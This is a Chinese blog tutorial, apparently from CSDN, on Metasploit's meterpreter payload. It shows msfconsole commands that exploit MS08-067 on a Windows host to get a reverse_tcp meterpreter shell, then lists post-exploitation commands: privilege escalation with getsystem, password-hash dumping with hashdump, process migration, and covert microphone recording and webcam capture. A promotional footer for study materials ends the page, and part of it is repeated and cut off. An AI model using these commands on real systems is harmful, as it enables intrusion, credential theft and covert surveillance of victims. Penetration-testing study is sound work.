- 高级、动态、可扩展的payload。
- 完全基于内存的DLL注入式payload(不写硬盘)。
将自身注入系统进程并建立stager。
基于stager上传和预加载DLL进行扩展模块的注入(客户端API)。
基于stager建立的socket基础上再建立加密的TLS/1.0通信隧道。
利用TLS隧道进一步加载后续扩展模块。(避免网络取证) - 服务器使用C语言编写。
- 客户端提供基于Ruby的全特性API(支持任何语言)。
使用ms08-067漏洞演示获取meterpreter shell
root@kali:~# msfconsole
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > show targets
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
msf5 exploit(windows/smb/ms08_067_netapi) > sessions
msf5 exploit(windows/smb/ms08_067_netapi) > sessions -i 1
# 获取到meterpreter session
meterpreter >
常用命令
# 保留session,返回msf
meterpreter >background
# 帮助
meterpreter >help
# linux移植命令(cd、ls、ps、cat、pwd、dir、mkdir、mv、rm、rmdir、edit(vi)等)
meterpreter >pwd
# lpwd查看本机当前工作目录
# 查看shell当前的uid
meterpreter >getuid
# 获取当且shell注入进程的pid
meterpreter >getpid
# 查看所有进程
meterpreter >ps
# 迁移到其它进程(跟进程id,一般迁移到explorer.exe)
meterpreter >migrate 652
# 查看当前用户权限
meterpreter >getprivs
# 获得system权限
meterpreter >getsystem
# hashdump获取账户密码哈希值
meterpreter >hashdump
# 杀死某个进程
meterpreter >kill 1524
# 获得目标shell
meterpreter >sehll
# 搜索目标主机上的文件
meterpreter >search -f win.ini
# 查看arp缓存
meterpreter >arp
# 查看开放端口
meterpreter >netstat
# 查看ip
meterpreter >ifconfig
# 路由表查看及更改帮助
meterpreter >route
meterpreter >route -h
# 查看空闲时间(没有进行操作的时间)
meterpreter >idletime
# 导入一个meterpreter操作文件
meterpreter >resource -r 1.txt
# 记录麦克风
meterpreter >record_mic
# 查看可使用的摄像头
meterpreter >webcam_list
# 每隔两秒拍一张照片
meterpreter >webcam_snap -i 2 -v false
meterpreter >lpwd
# 在本机进入某个目录
meterpreter >lcd /root/Desktop
# 在前台运行命令(后台运行为bgrun),按两下tab查看可用命令
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/61b0e17f73e29c01e89424930ff2b338.png)
![img](https://img-blog.csdnimg.cn/img_convert/644769fc1266d650ded5916790dd46ba.png)
![img](https://img-blog.csdnimg.cn/img_convert/1bdcb37e3f46ca5a535bf04d20e41025.png)
![img](https://img-blog.csdnimg.cn/img_convert/19abe608049af4f8510f117eca7f0cc9.png)
![img](https://img-blog.csdnimg.cn/img_convert/b77f36ba99f13a7e7488929e95d01170.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**